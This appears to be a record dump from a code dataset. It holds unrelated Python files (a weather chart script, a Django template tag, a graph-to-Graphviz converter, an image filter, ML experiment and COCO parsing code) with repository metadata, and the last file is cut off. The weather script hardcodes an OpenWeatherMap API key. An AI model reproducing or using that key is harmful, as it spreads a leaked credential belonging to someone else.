    df = df.sort_values(by=["primary","ocn"])
    # itertuples() rows are 1-indexed (index 0 is the dataframe index).
    ocn_pos = df.columns.get_loc("ocn") + 1
    primary_pos = df.columns.get_loc("primary") + 1
    current_primary = 0   # 0 = sentinel meaning "no cluster started yet"
    cluster = []
    for row in df.itertuples():
        # Key change: flush the finished cluster (if non-empty) and reset.
        if row[primary_pos] != current_primary:
            if current_primary != 0:
                if len(cluster) > 0:
                    db.put(int_to_bytes(current_primary), packer.pack(cluster))
            current_primary = row[primary_pos]
            cluster = []
        # Collect only secondary ocns — the primary itself is the key.
        if current_primary != row[ocn_pos]:
            cluster.append(row[ocn_pos])
    # Flush the trailing cluster left over after the loop.
    if len(cluster) > 0:
        db.put(int_to_bytes(current_primary), packer.pack(cluster))
    db.close()
    return db_path
| 34.877907 | 144 | 0.657443 | 1,554 | 11,998 | 4.710425 | 0.104247 | 0.064754 | 0.06571 | 0.054098 | 0.692213 | 0.587568 | 0.545765 | 0.510246 | 0.480191 | 0.441393 | 0 | 0.126434 | 0.230038 | 11,998 | 343 | 145 | 34.979592 | 0.665945 | 0.087431 | 0 | 0.328063 | 0 | 0.003953 | 0.187183 | 0.082988 | 0 | 0 | 0 | 0 | 0.094862 | 1 | 0.071146 | false | 0 | 0.047431 | 0.007905 | 0.13834 | 0.003953 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec961b19adfa565a12853c2adc2c965a0227de8 | 675 | py | Python | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | commons/templatetags/i18n_utils.py | jaboutboul/almalinux.org | 1dda8faff0e84e650fc9a90e9a104d387b4dd038 | [
"MIT"
] | null | null | null | from typing import Dict
from django import template
from django.urls import resolve, reverse
from django.urls.exceptions import Resolver404
from django.utils import translation
register = template.Library()
@register.simple_tag(takes_context=True)
def current_path_for_language_code(context: Dict, code: str) -> str:
    """Template tag: reverse the current request's view under the URL
    configuration of language *code*, restoring the active language
    afterwards. Unresolvable paths fall back to the site root."""
    try:
        view = resolve(context['request'].path)
    except Resolver404:
        view = resolve('/')
    saved_language = translation.get_language()
    try:
        translation.activate(code)
        url = reverse(view.url_name, args=view.args, kwargs=view.kwargs)
    finally:
        # Always restore the request's original language.
        translation.activate(saved_language)
    return url
| 25 | 72 | 0.724444 | 82 | 675 | 5.841463 | 0.47561 | 0.083507 | 0.058455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010929 | 0.186667 | 675 | 26 | 73 | 25.961538 | 0.861566 | 0 | 0 | 0.105263 | 0 | 0 | 0.011852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.263158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eca5d623cda5a3b20dea4d0ab793ea0d10b5c10 | 2,113 | py | Python | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | 1 | 2021-09-04T12:06:31.000Z | 2021-09-04T12:06:31.000Z | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | null | null | null | weather_forecast.py | pub12/weather-forecast | 20eefaa3a290af659fe3cc69c67858891d449fba | [
"MIT"
] | null | null | null | import requests
import datetime, pytz
from quickchart import QuickChart
# SECURITY NOTE(review): API key hardcoded and committed to source control;
# it should be loaded from an environment variable or config file and the
# exposed key rotated.
OPEN_WEATHER_MAP_APIKEY = '16786afe8ea0f6b683ab9298e52ac247'
def get_weather_data_by_location(lat, long):
    """Fetch the OpenWeatherMap "one call" forecast for a coordinate.

    lat, long: latitude/longitude (numbers or strings) interpolated into
        the query string.
    Returns the decoded JSON payload (dict) on HTTP 200, otherwise None.
    """
    url = f'https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={long}&appid={OPEN_WEATHER_MAP_APIKEY}&units=metric'
    print(f"Getting data via {url}")
    r = requests.get(url)
    # BUG FIX: the original returned r.json() unconditionally here, which
    # made the status-code check below unreachable dead code.
    if r.status_code == 200:
        return r.json()
    else:
        return None
def get_quick_chart(json_data, output_file):
    """Render a 7-day temperature line chart with QuickChart.

    json_data: OpenWeatherMap "one call" response dict (uses the 'daily'
        forecast entries, indexes 1..7).
    output_file: path the rendered chart image is written to.
    """
    qc = QuickChart()
    qc.width = 500
    # BUG FIX: the original assigned qc.width twice; the second assignment
    # was clearly meant to set the height of the 500x500 chart.
    qc.height = 500

    labels = []            # x-axis tick labels, one per forecast day
    weather_readings = []  # daily temperature readings (1 decimal place)
    for index in range(1, 8):
        # Forecast timestamps are epoch seconds; render in Singapore time.
        local_time = datetime.datetime.fromtimestamp(
            json_data['daily'][index]['dt'], tz=pytz.timezone('Asia/Singapore'))
        labels.append(local_time.strftime('%a %d/%m '))
        weather_readings.append(round(json_data['daily'][index]['temp']['day'], 1))

    # Chart.js-style config; labels/data are spliced in as Python-repr lists.
    # ("Celcius" typo in the axis label fixed to "Celsius".)
    qc.config = """{
    type: 'line',
    data: {
      labels: """ + str(labels) + """,
      datasets: [
        {
          backgroundColor: 'rgb(255, 99, 132)',
          data: """ + str(weather_readings) + """,
          lineTension: 0.4,
          fill: false,
        }
      ],
    },
    options: {
      title: { display: true, text: '7-Day Weather Forecast' },
      legend: { display: false},
      scales: { yAxes: [ { scaleLabel:
        { display: true, labelString: 'Temperature Degrees Celsius' } } ]},
      plugins: {
        datalabels: {
          display: true,
          align: 'bottom',
          backgroundColor: '#ccc',
          borderRadius: 3
        },
      }
    },
  }"""
    print(qc.get_short_url())  # short URL for quick visual inspection
    qc.to_file(output_file)    # save the rendered chart locally
if __name__ == '__main__':
    # Demo entry point: fetch the forecast for a fixed coordinate and
    # render the chart to mychart.png.
    print("Getting Weather Data")
    json_data = get_weather_data_by_location( '22.300910042194783', '114.17070449064359')
    get_quick_chart( json_data , 'mychart.png' )
| 29.760563 | 123 | 0.568859 | 236 | 2,113 | 4.915254 | 0.550847 | 0.034483 | 0.024138 | 0.034483 | 0.077586 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0538 | 0.296261 | 2,113 | 70 | 124 | 30.185714 | 0.726295 | 0.044487 | 0 | 0.070175 | 0 | 0.017544 | 0.537736 | 0.015889 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.052632 | 0 | 0.140351 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eca95466b6c45dbaa04be04c01346c77b736894 | 2,269 | py | Python | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | null | null | null | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | 25 | 2021-09-15T04:27:06.000Z | 2022-03-08T20:27:49.000Z | hack/graph.py | dofinn/cincinnati | 9a55fde2c8a7746d1b8e99d72e3ce5daa7aba837 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import argparse
import sys
import json
from typing import Dict, List
def run():
    """Read a Cincinnati upgrade graph (JSON) from stdin and print a
    Graphviz digraph on stdout.

    Hotfix/nightly versions are filtered out unless --include-hotfixes
    is passed.
    """
    parser = argparse.ArgumentParser(description=f'Output digraph data for Cincinnati json',
                                     usage="curl -sH 'Accept:application/json' 'https://api.openshift.com/api/upgrades_info/v1/graph?channel=stable-4.5' | ./graph.py --include-hotfixes | dot -Tsvg >graph.svg")
    parser.add_argument('--include-hotfixes', dest='hotfixes', action='store_true')
    parser.set_defaults(hotfixes=False)
    args = parser.parse_args()

    graph: Dict = json.load(sys.stdin)

    version_list: List[str] = list()  # a list of versions in the order returned by Cincy
    versions: Dict[str, Dict] = dict()  # maps version string to Cincy dict describing it
    edges: Dict[str, List] = dict()  # maps version string to list of version strings it has outgoing edges to

    for node in graph['nodes']:
        version = node['version']
        version_list.append(version)
        versions[version] = node
        # Ensure there is at least an empty list for all versions.
        edges[version] = []

    for edge_def in graph['edges']:
        # edge_def example [22, 20] where is number is an offset into versions
        from_ver = version_list[edge_def[0]]
        to_ver = version_list[edge_def[1]]
        edges[from_ver].append(to_ver)

    nodes_to_render = dict(versions)  # make a copy
    if not args.hotfixes:
        # Drop hotfix/nightly builds unless explicitly requested.
        for version in versions.keys():
            if 'hotfix' in version or 'nightly' in version:
                nodes_to_render.pop(version)

    version_order = list(nodes_to_render.keys())

    print('digraph Upgrades {')
    print(' labelloc=t;')
    print(' rankdir=BT;')

    # One dot node per rendered version, labelled and hyperlinked to its
    # release metadata URL (empty string when metadata has no url).
    for index, version in enumerate(version_order):
        node = versions[version]
        url = node.get('metadata', {}).get('url', '')
        print(f' {index} [ label="{version}" href="{url}" ];')

    # Emit the edges, again skipping hotfix/nightly targets when filtered.
    for index, version in enumerate(version_order):
        for edge in edges[version]:
            if not args.hotfixes and ('hotfix' in edge or 'nightly' in edge):
                continue
            dest = version_order.index(edge)
            print(f' {index}->{dest};')
    print('}')
# Script entry point: JSON graph on stdin -> Graphviz dot on stdout.
if __name__ == '__main__':
    run()
| 36.015873 | 210 | 0.631556 | 301 | 2,269 | 4.644518 | 0.421927 | 0.031474 | 0.027897 | 0.030043 | 0.11731 | 0.054363 | 0.054363 | 0 | 0 | 0 | 0 | 0.005848 | 0.246364 | 2,269 | 62 | 211 | 36.596774 | 0.811696 | 0.144998 | 0 | 0.044444 | 0 | 0.022222 | 0.211588 | 0.012933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.088889 | 0 | 0.111111 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ecb818dfb22cd3164c6594184c3fa42e6bdc1d1 | 543 | py | Python | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | 29 | 2019-03-25T09:35:12.000Z | 2022-01-08T22:09:03.000Z | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | null | null | null | third_party/manipulate_images.py | DahlitzFlorian/python-snippets | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | [
"MIT"
] | 4 | 2020-05-19T21:18:12.000Z | 2021-05-18T12:49:21.000Z | import imageio
import numpy as np
import scipy.ndimage
# Load the source photo, then build the two inputs for the pencil-sketch
# style dodge blend below: an inverted grayscale copy and a blurred copy.
start_img = imageio.imread(
    "http://static.cricinfo.com/db/PICTURES/CMS/263600/263697.20.jpg"
)
# Luma weights (0.299/0.587/0.114) convert RGB to gray; 255 - ... inverts.
gray_inv_img = 255 - np.dot(start_img[..., :3], [0.299, 0.587, 0.114])
blur_img = scipy.ndimage.filters.gaussian_filter(gray_inv_img, sigma=5)
def dodge(front, back):
    """Color-dodge blend of two grayscale images.

    front, back: float ndarrays of the same shape, values in 0-255.
    Returns a uint8 ndarray. Pixels where the blend overflows 255 —
    including the division-by-zero case back == 255 — are clamped to 255.
    """
    # Suppress divide-by-zero / invalid warnings for back == 255 pixels;
    # those entries are overwritten with 255 below anyway.
    with np.errstate(divide="ignore", invalid="ignore"):
        result = front * 255 / (255 - back)
        overflow = np.logical_or(result > 255, back == 255)
    result[overflow] = 255
    return result.astype("uint8")
# Blend blur over the inverted gray image and write the final sketch image.
final_img = dodge(blur_img, gray_inv_img)
imageio.imwrite("final.jpg", final_img)
| 25.857143 | 71 | 0.707182 | 87 | 543 | 4.252874 | 0.551724 | 0.056757 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100642 | 0.139963 | 543 | 20 | 72 | 27.15 | 0.691649 | 0 | 0 | 0 | 0 | 0.071429 | 0.141805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ecdc8b1a11d72a44089a8ee90fca21bec3ec6e2 | 935 | py | Python | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | 1 | 2015-11-06T01:33:04.000Z | 2015-11-06T01:33:04.000Z | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | null | null | null | dedupe/convenience.py | BrianSipple/dedupe | d276da675e319d5cc6e7cafd4963deebde0d485d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size):
    '''Randomly sample pairs of records from a data dictionary'''
    # list(...) makes this work on Python 3, where dict.values() returns a
    # non-indexable view (the original relied on Python 2 returning a list).
    data_list = list(data.values())
    random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
    # Each sampled pair is the two records at the drawn index positions.
    return tuple((data_list[k1], data_list[k2]) for k1, k2 in random_pairs)
def blockData(data_d, blocker):
    '''Group records into blocks keyed by the blocker's predicate keys.

    data_d: dict mapping record id -> record.
    blocker: callable yielding block keys for a (record_id, record) pair;
        must also expose tfIdfBlocks() for corpus-wide preparation.
    Returns a tuple of {record_id: record} dicts, one per block key.
    '''
    blocks = dedupe.backport.OrderedDict({})
    # NOTE: the original also built record_blocks/key_blocks OrderedDicts
    # here; both were never used, so they have been removed.

    # .items() instead of the Python-2-only .iteritems() — works on both.
    blocker.tfIdfBlocks(data_d.items())

    for (record_id, record) in data_d.items():
        for key in blocker((record_id, record)):
            blocks.setdefault(key, {}).update({record_id: record})

    return tuple(block for block in blocks.values())
| 23.375 | 75 | 0.682353 | 117 | 935 | 5.299145 | 0.444444 | 0.051613 | 0.096774 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00664 | 0.194652 | 935 | 39 | 76 | 23.974359 | 0.816733 | 0.154011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ece7144c7b2ec17653f0f9dba2cd6ae36bf25de | 11,099 | py | Python | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | 5 | 2021-05-20T10:39:47.000Z | 2022-01-23T09:37:38.000Z | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | null | null | null | bin/xpc_gsd_exp.py | gengala/Random-Probabilistic-Circuits | 8871a9f1e6ace9d8ea7604b69abcc270c7792620 | [
"Apache-2.0"
] | null | null | null | import argparse
try:
from time import perf_counter
except:
from time import time
perf_counter = time
import dataset
import numpy as np
import datetime
import os
import logging
from src.inference import log_likelihood
from src.xpc import create_xpc, SD_LEVEL_2
from src.cltree import create_cltree
from utils import circuit_size
from error import Error, NoPartitioningFound
def stats_format(stats_list, separator, digits=5):
    """Join stats into a single string.

    Ints are rendered with str(), floats with a fixed number of decimal
    digits, and any other value is passed through unchanged.
    """
    def render(value):
        # Per-item formatting rule; note bools are ints and take str().
        if isinstance(value, int):
            return str(value)
        if isinstance(value, float):
            return '{0:.{1}f}'.format(value, digits)
        return value

    return separator.join(render(value) for value in stats_list)
#########################################
# creating the opt parser
parser = argparse.ArgumentParser()
parser.add_argument("dataset", type=str, nargs=1,
                    help='Specify a dataset name from data (e.g. nltcs)')
parser.add_argument('-r', '--runs', type=int, nargs=1,
                    default=10,
                    help='Number of runs for each configuration')
parser.add_argument('-det', '--determinism', type=int, nargs='+',
                    default=[0],
                    help='0 for no determinism; 1 for determinism')
parser.add_argument('-m', '--min-partition-instances', type=int, nargs='+',
                    default=[256],
                    help='Minimum number of instances per partition')
parser.add_argument('-l', '--conjunction-length', type=int, nargs='+',
                    default=[2],
                    help='Conjunction length')
parser.add_argument('-a', '--arity', type=int, nargs='+',
                    default=[2],
                    help='Maximum number of sum nodes children')
parser.add_argument('-p', '--max-partitions', type=int, nargs='+',
                    default=[1000],
                    help='Maximum number of leaf partitions')
parser.add_argument('-s', '--smoothing', type=float, nargs='+',
                    default=[0.01],
                    help='Smoothing parameter alpha')
parser.add_argument('-o', '--output', type=str, nargs='?',
                    default='./exp/',
                    help='Output dir path')
#
# parsing the args
args = parser.parse_args()
#
# gathering args; each hyper-parameter accepts multiple values ("_l"
# suffix = list), and the grid search below iterates every combination.
runs = args.runs[0]
det_level_l = args.determinism
min_part_inst_l = args.min_partition_instances
conj_len_l = args.conjunction_length
arity_l = args.arity
max_parts_l = args.max_partitions
alpha_smoothing_l = args.smoothing
output = args.output
(dataset_name,) = args.dataset
#
# Opening the file for test prediction; the run directory is timestamped
# so repeated experiments never clobber each other.
date_string = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
out_path = output + dataset_name + '_' + date_string
out_xpc_gsd_path = out_path + '/xpc_gsd.lls'
#
# creating dir if non-existing
if not os.path.exists(os.path.dirname(out_xpc_gsd_path)):
    os.makedirs(os.path.dirname(out_xpc_gsd_path))
logging.basicConfig(filename=out_path + '/exp.log', level=logging.INFO)
logging.info("Starting with arguments:\n%s", args)
# I shall print here all the stats
#
# elaborating the dataset
logging.info('Loading dataset: %s..', dataset_name)
train, valid, test = dataset.load_train_val_test_csvs(dataset_name)

# Tab-separated header row for the results file written in the loop below;
# column order must match the stats_format() call there.
preamble = "runs\tdet-level\tmin-part-inst\t" \
           "conj-len\tarity\tmax-parts\tsmoothing\t" \
           "avg-spn-train-time\t" \
           "avg-n-parts\tstd-n-parts\t" \
           "avg-circuit-sizes\tstd-circuit-sizes\t" \
           "avg-avg-valid-lls\tstd-avg-valid-lls\t" \
           "avg-avg-test-lls\tstd-avg-test-lls\t" \
           "best-spn-avg-test-ll\n"

exp_start_t = perf_counter()
# Grid search: for every hyper-parameter combination, train `runs` XPCs,
# evaluate them on valid/test, and append one TSV row of aggregated stats.
with open(out_xpc_gsd_path, 'w') as out_xpc_gsd:

    out_xpc_gsd.write("parameters:\n{0}\n\n".format(args))
    out_xpc_gsd.write(preamble)
    out_xpc_gsd.flush()

    total_combinations = np.prod([len(det_level_l), len(min_part_inst_l), len(conj_len_l),
                                  len(arity_l), len(max_parts_l), len(alpha_smoothing_l)])
    comb_counter = 1
    #
    # looping over all parameters combinations
    for det_level in det_level_l:
        for min_part_inst in min_part_inst_l:
            for conj_len in conj_len_l:
                for arity in arity_l:
                    for max_parts in max_parts_l:
                        for alpha_smoothing in alpha_smoothing_l:

                            combination_string = 'ds=%s, det=%s, m=%s, l=%s, a=%s, p=%s, s=%s, (%s/%s)' % \
                                (dataset_name, det_level, min_part_inst, conj_len, arity,
                                 max_parts, alpha_smoothing, comb_counter, total_combinations)
                            print(combination_string)
                            logging.info('Combination: %s' % combination_string)

                            try:
                                #
                                # Start training: one XPC per run, seeded
                                # by the run index for reproducibility.
                                xpc_gsd_l = [None] * runs
                                n_parts_l = [None] * runs
                                train_start_t = perf_counter()
                                for k in range(runs):
                                    xpc_gsd_l[k], n_parts_l[k] = \
                                        create_xpc(data=train,
                                                   sd_level=SD_LEVEL_2,
                                                   det_level=det_level,
                                                   min_part_inst=min_part_inst,
                                                   conj_len=conj_len,
                                                   arity=arity,
                                                   leaves=create_cltree,
                                                   alpha=alpha_smoothing,
                                                   max_parts=max_parts,
                                                   random_seed=k)
                                train_end_t = perf_counter()
                                train_t = train_end_t - train_start_t
                                #
                                # End training

                                #
                                # Start validating: per-instance log-likelihoods,
                                # one column per run.
                                valid_lls = np.zeros((valid.shape[0], runs))
                                valid_start_t = perf_counter()
                                for k in range(runs):
                                    print('Validating XPC_%s/%s' % (k, runs))
                                    valid_lls[:, k] = log_likelihood(xpc_gsd_l[k], valid)[:, 0]
                                valid_end_t = perf_counter()
                                valid_t = valid_end_t - valid_start_t  # NOTE: currently unused
                                #
                                # End validating

                                #
                                # Start testing (same layout as validation)
                                test_lls = np.zeros((test.shape[0], runs))
                                test_start_t = perf_counter()
                                for k in range(runs):
                                    print('Testing XPC_%s/%s' % (k, runs))
                                    test_lls[:, k] = log_likelihood(xpc_gsd_l[k], test)[:, 0]
                                test_end_t = perf_counter()
                                test_t = test_end_t - test_start_t  # NOTE: currently unused
                                #
                                # End testing

                                #
                                # Start computing metrics: averages/std-devs
                                # across runs of partitions, circuit sizes
                                # and per-instance mean log-likelihoods.
                                avg_spn_train_t = train_t / runs
                                avg_n_parts = np.mean(n_parts_l)
                                std_n_parts = np.std(n_parts_l)
                                circuit_sizes = np.zeros(runs)
                                for k in range(runs):
                                    circuit_sizes[k] = circuit_size(xpc_gsd_l[k])
                                avg_circuit_sizes = np.mean(circuit_sizes)
                                std_circuit_sizes = np.std(circuit_sizes)
                                avg_valid_lls = np.zeros(runs)
                                for k in range(runs):
                                    avg_valid_lls[k] = np.mean(valid_lls[:, k])
                                avg_avg_valid_lls = np.mean(avg_valid_lls)
                                std_avg_valid_lls = np.std(avg_valid_lls)
                                avg_test_lls = np.zeros(runs)
                                for k in range(runs):
                                    avg_test_lls[k] = np.mean(test_lls[:, k])
                                avg_avg_test_lls = np.mean(avg_test_lls)
                                std_avg_test_lls = np.std(avg_test_lls)
                                # Model selection: report the test LL of the
                                # run with the best validation LL.
                                best_spn_avg_test_ll = avg_test_lls[np.argmax(avg_valid_lls)]
                                #
                                # End computing metrics

                                #
                                # Write to file a line for the grid
                                stats = stats_format([runs,
                                                      det_level,
                                                      min_part_inst,
                                                      conj_len,
                                                      arity,
                                                      max_parts,
                                                      alpha_smoothing,
                                                      avg_spn_train_t,
                                                      avg_n_parts,
                                                      std_n_parts,
                                                      avg_circuit_sizes,
                                                      std_circuit_sizes,
                                                      avg_avg_valid_lls,
                                                      std_avg_valid_lls,
                                                      avg_avg_test_lls,
                                                      std_avg_test_lls,
                                                      best_spn_avg_test_ll],
                                                     '\t',
                                                     digits=5)
                                out_xpc_gsd.write(stats + '\n')
                                out_xpc_gsd.flush()

                            except Error as err:
                                # Expected domain failures (e.g. no valid
                                # partitioning): log and skip this combination.
                                logging.info(err)
                                logging.info('Discarded combination')
                            except Exception as err:
                                # Unexpected failure: record traceback, keep going.
                                logging.exception(err)
                            finally:
                                comb_counter += 1

exp_end_t = perf_counter()
out_xpc_gsd.close()  # NOTE: redundant — the with-statement already closed it

print('Grid search ended on ' + dataset_name)
logging.info('Grid search ended on ' + dataset_name)
| 40.655678 | 111 | 0.441211 | 1,101 | 11,099 | 4.176203 | 0.196185 | 0.022184 | 0.021531 | 0.014354 | 0.173119 | 0.141148 | 0.11853 | 0.089169 | 0.07264 | 0.053067 | 0 | 0.005465 | 0.472475 | 11,099 | 272 | 112 | 40.805147 | 0.779846 | 0.035949 | 0 | 0.065574 | 0 | 0.005464 | 0.0912 | 0.024094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005464 | false | 0 | 0.071038 | 0 | 0.081967 | 0.021858 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed1a2ebe6b18d55c5ac39c8d12715c6e6c4aa9a | 8,202 | py | Python | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | src/mycocoparser.py | partham16/ev_objdet_pc | 2ab64c94a9d7693f92bb3e4466014260f77072bb | [
"MIT"
] | null | null | null | # Motivation for replacing the default `coco` parser
# See Issue : https://github.com/airctic/icevision/issues/467
import json
import os
import pickle
from collections import defaultdict
from pathlib import Path
from typing import Dict, Hashable, List, Tuple, Union
import numpy as np
from icevision import ClassMap
from icevision.core import BBox
from icevision.parsers import Parser
from icevision.parsers.mixins import (BBoxesMixin, FilepathMixin, LabelsMixin,
SizeMixin)
from PIL import Image, ImageStat
from tqdm import tqdm
def empty_list():
    # Module-level factory for defaultdict(list); a named function (rather
    # than a lambda) is presumably used so the stats object stays picklable
    # (load_stats pickles CocoDatasetStats) — TODO confirm.
    return []
class CocoDatasetStats:
    """Calculate dataset stats"""

    # Attributes populated by __init__:
    # num_cats
    # num_imgs
    # num_bboxs
    # cat2name
    # class_map
    # lbl2cat
    # cat2lbl
    # img2fname
    # imgs
    # img2cat2bs
    # img2cbs
    # cat2ibs
    # avg_ncats_per_img
    # avg_nboxs_per_img
    # avg_nboxs_per_cat
    # img2sz
    # chn_means
    # chn_stds
    # avg_width
    # avg_height

    def __init__(self, f_ann: str, img_dir: Path):
        """Parse a COCO-style annotation JSON and scan the images on disk.

        f_ann: path to the COCO annotation JSON file.
        img_dir: directory containing the image files named in the JSON.
        """
        self.img_dir = img_dir
        with open(f_ann, "r") as json_f:
            ann = json.load(json_f)
        self.num_cats = len(ann["categories"])
        self.num_imgs = len(ann["images"])
        self.num_bboxs = len(ann["annotations"])
        # build cat id to name, assign FRCNN
        self.cat2name = {c["id"]: c["name"] for c in ann["categories"]}
        self.class_map = ClassMap(list(self.cat2name.values()))
        # need to translate coco subset category id to indexable label id
        # expected labels w 0 = background
        self.lbl2cat = {self.class_map.get_name(n): c for c, n in self.cat2name.items()}
        self.cat2lbl = {cat: lbl for lbl, cat in self.lbl2cat.items()}
        self.lbl2cat[0] = (0, "background")
        self.cat2lbl[0] = 0
        # img_id to file map
        self.img2fname = {img["id"]: img["file_name"] for img in ann["images"]}
        self.imgs = [
            {"id": img_id, "file_name": img_fname}
            for (img_id, img_fname) in self.img2fname.items()
        ]
        # build up some maps for later analysis:
        #   img2l2bs: img_id -> {label_id -> [bbox, ...]}
        #   img2lbs:  img_id -> [(label_id, x, y, w, h), ...]
        #   l2ibs:    label_id -> [(img_id, x, y, w, h), ...]
        self.img2l2bs: Dict = {}
        self.img2lbs: Dict = defaultdict(empty_list)
        self.l2ibs: Dict = defaultdict(empty_list)
        # anno_id = 0
        for a in ann["annotations"]:
            img_id = a["image_id"]
            cat_id = a["category_id"]
            lbl_id = self.cat2lbl[cat_id]
            l2bs_for_img = self.img2l2bs.get(
                img_id, {lbl: [] for lbl in range(1 + len(self.cat2name))}
            )
            (x, y, w, h) = a["bbox"]
            # Degenerate boxes (width or height <= 1 px) are dropped.
            if w > 1 and h > 1:
                b = (x, y, w, h)
                ib = (img_id, *b)
                lb = (lbl_id, *b)
                l2bs_for_img[lbl_id].append(b)
                self.l2ibs[lbl_id].append(ib)
                self.img2lbs[img_id].append(lb)
            # NOTE(review): images with zero annotations never get an
            # img2l2bs entry, so the [0].append below would KeyError for
            # them — presumably every image is annotated; verify.
            self.img2l2bs[img_id] = l2bs_for_img

        acc_ncats_per_img = 0.0
        acc_nboxs_per_img = 0.0
        for img_id, l2bs in self.img2l2bs.items():
            acc_ncats_per_img += len(l2bs)
            for lbl_id, bs in l2bs.items():
                acc_nboxs_per_img += len(bs)
        self.avg_ncats_per_img = acc_ncats_per_img / self.num_imgs
        self.avg_nboxs_per_img = acc_nboxs_per_img / self.num_imgs

        acc_nboxs_per_cat = 0.0
        for lbl_id, ibs in self.l2ibs.items():
            acc_nboxs_per_cat += len(ibs)
        self.avg_nboxs_per_cat = acc_nboxs_per_cat / self.num_cats

        # compute Images per channel means and std deviation using PIL.ImageStat.Stat()
        self.img2sz = {}
        n = 0
        mean = np.zeros((3,))
        stddev = np.zeros((3,))
        avgw = 0
        avgh = 0
        for img in tqdm(self.imgs):
            img_id = img["id"]
            fname = f"{img_dir}/{img['file_name']}"
